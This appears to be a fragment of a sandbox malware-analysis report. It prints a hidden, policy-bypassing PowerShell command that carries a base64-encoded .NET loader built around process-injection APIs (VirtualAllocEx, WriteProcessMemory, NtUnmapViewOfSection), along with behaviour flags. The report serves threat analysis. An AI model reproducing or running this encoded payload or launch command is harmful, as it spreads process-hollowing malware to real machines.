VySGlkZGVuQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAT2JmdXNjYXRpb25BdHRyaWJ1dGUATXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBZYW5vQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTdXBwcmVzc1VubWFuYWdlZENvZGVTZWN1cml0eUF0dHJpYnV0ZQBCeXRlAGdldF9WYWx1ZQBzZXRfVmFsdWUAR2V0T2JqZWN0VmFsdWUAZHdYU2l6ZQBkd1lTaXplAGdldF9TaXplAGJ1ZmZlclNpemUAU2l6ZU9mAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcAVG9TdHJpbmcAcGF0aABsZW5ndGgATWFyc2hhbABNaWNyb3NvZnQuVmlzdWFsQmFzaWMuTXlTZXJ2aWNlcy5JbnRlcm5hbABTeXN0ZW0uQ29tcG9uZW50TW9kZWwAQ2xhc3NMaWJyYXJ5MS5kbGwAa2VybmVsMzIuZGxsAG50ZGxsLmRsbABLaWxsAFN5c3RlbQByZXNvdXJjZU1hbgBCb29sZWFuAGJ5dGVzV3JpdHRlbgBTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduAFZlcnNpb24AZ2V0X0FwcGxpY2F0aW9uAE15QXBwbGljYXRpb24AcHJvY2Vzc0luZm9ybWF0aW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAE50VW5tYXBWaWV3T2ZTZWN0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBIYW5kbGVSdW4AQ3VsdHVyZUluZm8Ac3RhcnR1cEluZm8AWmVybwBEZXNrdG9wAG1fQXBwT2JqZWN0UHJvdmlkZXIAbV9Vc2VyT2JqZWN0UHJvdmlkZXIAbV9Db21wdXRlck9iamVjdFByb3ZpZGVyAG1fTXlXZWJTZXJ2aWNlc09iamVjdFByb3ZpZGVyAEJ1ZmZlcgBidWZmZXIAZ2V0X1Jlc291cmNlTWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBCaXRDb252ZXJ0ZXIAZ2V0X0NvbXB1dGVyAE15Q29tcHV0ZXIAU3RkRXJyb3IAQ2xlYXJQcm9qZWN0RXJyb3IAU2V0UHJvamVjdEVycm9yAEFjdGl2YXRvcgAuY3RvcgAuY2N0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBnZXRfV2ViU2VydmljZXMATXlXZWJTZXJ2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQXBwbGljYXRpb25TZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2VzAENsYXNzTGlicmFyeTEuTXkuUmVzb3VyY2VzAENsYXNzTGlicmFyeTEuUmVzb3VyY2VzLnJlc291cmNlcwBEZWJ1Z2dpbmdNb2RlcwBpbmhlcml0SGFuZGxlcwB0aHJlYWRBdHRyaWJ1dGVzAHByb2Nlc3NBdHRyaWJ1dGVzAEdldEJ5dGVzAGNyZWF0aW9uRmxhZ3MAZHdGbGFncwBnZXRfU2V0dGluZ3MATXlTZXR0aW5ncwBSZWZlcmVuY2VFcXVhbHMAZHdYQ291bnRDaGFycwBkd1lDb3VudENoYXJzAFJ1bnRpbWVIZWxwZXJzAENyZWF0ZVByb2Nlc3MAcHJvY2VzcwBiYXNlQWRkcmVzcwBhZGRyZXNzAENvbmNhdABGb3JtYXQAT2JqZWN0AE15UHJvamVjdABwcm90ZWN0AGdldF9EZWZhdWx0AGVudmlyb25tZW50AFN0ZElucHV0AFN0ZE91dHB1dABtX0NvbnRleHQAV293NjRHZXRUaHJlYWRDb250ZXh0AFdvdzY0U2V0VGhyZWFkQ29udGV4dABjb250ZXh0AHdTaG93V2luZG93AFZpcnR1YWxBbGxvY0V4AENsYXNzTGlicmFyeTEuTXkAQXJyYXkAZ2V0X0Fzc2VtYmx5AEJsb2NrQ29weQBSZWFkUHJvY2Vzc01lbW9yeQBXcml0ZVByb2Nlc3NNZW1vcnkAY3VycmVudERpcmVjdG9yeQBTeXN0ZW0uU2VjdXJpdHkASXNOdWxsT3JFbXB0eQBNeVNldHRpbmdzUHJvcGVydHkAAAAAAC9DAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4AUgBlAHMAbwB1AHIAYwBlAHMAAAsiAHsAMAB9ACIAAAMgAAAAAAAXcD7ydsIcRpthSuvAB90GAAMgAAEFIAEBERUGFRIoARIMBhUSKAESCAYVEigBEh0GFRIoARIkBCAAEwAEAAEcHAQgAQIcAyAACAYAARItETEDIAAOAh4ABRABAB4ABhUSOQETAAYVEigBEwAHBhUSOQETAAITAAUgAQETAAUAAgIcHAQgABJFBiACAQ4SRQYAARJNEk0CBg4FAAIODhwFAAEIEi0EAAECDgYAAw4ODg4CBhgGAAIIHQUIAwAACAYAAgYdBQgCHQUKAAUBEnUIEnUICAUAAR0FCAUAAQESZQUAARJZCAMAAAEEIAEBCAYgAQERgJEEIAEBDgQgAQECBSACAQ4OByAEAQ4ODg4EBwESDAQHARIIBAcBEh0EBwESJAcHAxI9AhI9BAcBEkEEBwESGAUHAwIIAjUHLQIIDhEwESwICB0ICAgICAIICAYdBQgCAgICAgICAgICAggICAgIAh0FAgICAgICAhJZAgMHAQIDBwEIBAcBEi0DBwEOBQcCHgACBAoBHgAHBwMTABMAAgQKARMACLA/X38R1Qo6CLd6XFYZNOCJEDEALgAwAC4AMQA1AC4AMAAHBhUSKAESDAcGFRIoARIIBwYVEigBEh0HBhUSKAESJAMGEj0DBhJBAwYSGAIGCQIGCAIGBgQAABIMBAAAEggEAAASHQQAABIkBAAAEj0EAAASQQUAAQESQQQAABIYEQAKAg4OGBgCCRgOEBEwEBEsBgACAhgdCAoABQIYCBAICBAICgAFAhgIHQUIEAgFAAIIGAgIAAUIGAgICAgEAAEIGAYAAgIOHQUIAAQCDg4dBQIEIAASLQcQAQEeAB4ABzABAQEQHgAECAASDAQIABIIBAgAEh0ECAASJAQIABI9BAgAEkEECAASGAQoABMACAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAcBAAAAABIBAA1DbGFzc0xpYnJhcnkxAAAFAQAAAAAXAQASQ29weXJpZ2h0IMKpICAyMDIxAAApAQAkNDUxNkUwRTEtNUMwRS00QjRFLTlBMzItOUUzN0UyM0U3NDI2AAAMAQAHMS4wLjAuMAAASQEAGi5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC41AQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZRIuTkVUIEZyYW1ld29yayA0LjUEAQAAAAgBAAEAAAAAABgBAApNeVRlbXBsYXRlCDExLjAuMC4wAABAAQAzU3lzdGVtLlJlc291cmNlcy5Ub29scy5TdHJvbmdseVR5cGVkUmVzb3VyY2VCdWlsZGVyBzQuMC4wLjAAAFkBAEtNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLkVkaXRvcnMuU2V0dGluZ3NEZXNpZ25lci5TZXR0aW5nc1NpbmdsZUZpbGVHZW5lcmF0b3IIMTIuMC4wLjAAAAgBAAIAAAAAAGEBADRTeXN0ZW0uV2ViLlNlcnZpY2VzLlByb3RvY29scy5Tb2FwSHR0cENsaWVudFByb3RvY29sEkNyZWF0ZV9fSW5zdGFuY2VfXxNEaXNwb3NlX19JbnN0YW5jZV9fAAAAHQEAAQBUAhVTdHJpcEFmdGVyT2JmdXNjYXRpb24AEAEAC015LkNvbXB1dGVyAAATAQAOTXkuQXBwbGljYXRpb24AAAwBAAdNeS5Vc2VyAAATAQAOTXkuV2ViU2VydmljZXMAABABAAtNeS5TZXR0aW5ncwAAALQAAADOyu++AQAAAJEAAABsU3lzdGVtLlJlc291cmNlcy5SZXNvdXJjZVJlYWRlciwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5I1N5c3RlbS5SZXNvdXJjZXMuUnVudGltZVJlc291cmNlU2V0AgAAAAAAAAAAAAAAUEFEUEFEULQAAADERwAAAAAAAAAAAADeRwAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0EcAAAAAAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWGAAADwDAAAAAAAAAAAAADwDNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsAScAgAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAAB4AgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0AHMAAAAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAAAAAAAARAAOAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAABEABIAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBkAGwAbAAAAEgAEgABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAAEMAbwBwAHkAcgBpAGcAaAB0ACAAqQAgACAAMgAwADIAMQAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAATAASAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBkAGwAbAAAADwADgABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMQAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAMAAAA8DcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADflRHPAAAAAAIAAABxAAAAoG4AAKBQAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAUlNEU6WXe+bK/zlMjaJoPukrwuABAAAARTpcUHJpdmFkb3NcTm92YSBwYXN0YVxNZXRvZG8gREZcQ2xhc3NMaWJyYXJ5M1xDbGFzc0xpYnJhcnkzXG9ialxEZWJ1Z1xDbGFzc0xpYnJhcnkzLnBkYgA5bwAAAAAAAAAAAABTbwAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARW8AAAAAAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAAAAAA/yUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFiAAAA8AwAAAAAAAAAAAAA8AzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEnAIAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAeAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0AbQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAAAAAAEQADgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAzAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAALgAwAAAARAASAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAzAC4AZABsAGwAAABIABIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAgADIAMAAyADEAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAEwAEgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAzAC4AZABsAGwAAAA8AA4AAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAGg/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2724
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAN2VK9EAAAAAAAAAAOAAIiALAVAAAFAAAAAGAAAAAAAAZm8AAAAgAAAAgAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAABFvAABPAAAAAIAAAJgDAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAABobgAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAbE8AAAAgAAAAUAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJgDAAAAgAAAAAQAAABSAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAAVgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABFbwAAAAAAAEgAAAACAAUAFCQAAGwZAAABAAAAAAAAAIA9AADoMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKBcAAAoqJgACKBgAAAoAKqZzGQAACoABAAAEcxoAAAqAAgAABHMbAAAKgAMAAARzHAAACoAEAAAEKhMwAQAQAAAAAQAAEQB+AQAABG8dAAAKCisABioTMAEAEAAAAAIAABEAfgIAAARvHgAACgorAAYqEzABABAAAAADAAARAH4DAAAEbx8AAAoKKwAGKhMwAQAQAAAABAAAEQB+BAAABG8gAAAKCisABioTMAIAPAAAAAUAABEAfgUAAAQUKCEAAAoLBywhcgEAAHDQBQAAAigiAAAKbyMAAApzJAAACgwIgAUAAAQAAH4FAAAECisABioTMAEACwAAAAYAABEAfgYAAAQKKwAGKiIAAoAGAAAEKhMwAwAmAAAABwAAEQAoCAAABnIxAABwfgYAAARvJQAACigmAAAKCwd0BQAAGworAAYqVnMNAAAGKCcAAAp0BgAAAoAHAAAEKh4CKCgAAAoqEzABAAsAAAAIAAARAH4HAAAECisABioAEzABAAsAAAAIAAARACgOAAAGCisABioeAigpAAAKKgAbMAcABgEAAAkAABEAAHJNAABwKCoAAAoNCSwDACtFAHMrAAAKEwRzLAAAChMFEQUXby0AAAoAEQVygQAAcG8uAAAKABEFcvUAAHBvLwAACgARBBEFbzAAAAoAEQRvMQAACiYAfjIAAApymgEAcBdvMwAACgoGcvYBAHByTQAAcG80AAAKAAZvNQAACgBzNgAACgIoNwAACig4AAAKCwcoNwAACgtyCAIAcAwIck4CAHAoOQAACgwoOgAACigLAAAGbzsAAApyZgIAcG88AAAKcpACAHBvPQAAChQYjRcAAAElFghymAIAcCg5AAAKoiUXByg+AAAKom8/AAAKJt4QJShAAAAKEwYAKEEAAAreAAAqAAABEAAAAAABAPP0ABAlAAABEzACABIAAAAKAAARAAIDKCYAAAooQgAACgorAAYqAAATMAEADAAAAAsAABEAAihDAAAKCisABioTMAEAEAAAAAwAABEA0AkAAAIoIgAACgorAAYqEzABAAwAAAANAAARAAIoRAAACgorAAYqEzACAB0AAAAOAAARAAKMBgAAGxT+AQsHLAgoAQAAKworBQACCisABiomAAP+FQYAABsqJgACKCkAAAoAKgAAABMwAgA1AAAADwAAEQACe0YAAApvRwAACgsHjAkAABsU/gEMCCwUKAIAACsLAntGAAAKB29IAAAKAAAABworAAYqUgACKCkAAAoAAnNJAAAKfUYAAAoqAABCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAAB0CAAAI34AAOAIAAAcCQAAI1N0cmluZ3MAAAAA/BEAALACAAAjVVMArBQAABAAAAAjR1VJRAAAALwUAACwBAAAI0Jsb2IAAAAAAAAAAgAAAVcVogkJDwAAAPoBMwAWAAABAAAANQAAAAoAAAAIAAAAGgAAAAUAAABJAAAAQAAAAA8AAAAFAAAACgAAAAsAAAAJAAAAAQAAAAMAAAABAAAAAgAAAAMAAAACAAAAAADuBAEAAAAAAAYAtAObBwYAIQSbBwYAiwLcBg8ACQgAAAYA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AAD/AEACAgAEAAMAAgAFAAUAAgAGAAcAAgAHAAkAAgAIAAsAAgAJAA0AAQAKAA0AAgALAA8AAgAOABEAAgAPABMAAgAZABUALgA1ADwAQwCgAFQBagF5AYABBIAAAAEAAAAAAAAAAAAAAAAAVAAAAAQAAAAAAAAAAAAAAI4BsQAAAAAABAAAAAAAAAAAAAAAjgEABQAAAAAKAAAAAAAAAAAAAACXAboAAAAAAAAAAAABAAAA5wcAAAkABAAKAAQAAAAQABQAfAAAABAALQB8AAAAAAAvAHwAiwBdAYsAgwEAAAAAAENvbnRleHRWYWx1ZWAxAFRocmVhZFNhZmVPYmplY3RQcm92aWRlcmAxAENsYXNzMQBnZXRfQ2xhc3NMaWJyYXJ5MQBNaWNyb3NvZnQuV2luMzIAQ2xhc3NMaWJyYXJ5MwA8TW9kdWxlPgBMQWJXSksAU3lzdGVtLklPAFQARGlzcG9zZV9fSW5zdGFuY2VfXwBDcmVhdGVfX0luc3RhbmNlX18AUHJvamVjdERhdGEAbXNjb3JsaWIATWljcm9zb2Z0LlZpc3VhbEJhc2ljAExvYWQAU3luY2hyb25pemVkAEdldE1ldGhvZABDcmVhdGVJbnN0YW5jZQBnZXRfR2V0SW5zdGFuY2UAZGVmYXVsdEluc3RhbmNlAGluc3RhbmNlAEdldEhhc2hDb2RlAEludm9rZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBGaWxlAHNldF9XaW5kb3dTdHlsZQBQcm9jZXNzV2luZG93U3R5bGUAc2V0X0ZpbGVOYW1lAEdldFR5cGUAZ2V0X0N1bHR1cmUAc2V0X0N1bHR1cmUAcmVzb3VyY2VDdWx0dXJlAE1ldGhvZEJhc2UAQXBwbGljYXRpb25CYXNlAEFwcGxpY2F0aW9uU2V0dGluZ3NCYXNlAENsb3NlAFN0clJldmVyc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBIZWxwS2V5d29yZEF0dHJpYnV0ZQBHZW5lcmF0ZWRDb2RlQXR0cmlidXRlAERlYnVnZ2VyTm9uVXNlckNvZGVBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBFZGl0b3JC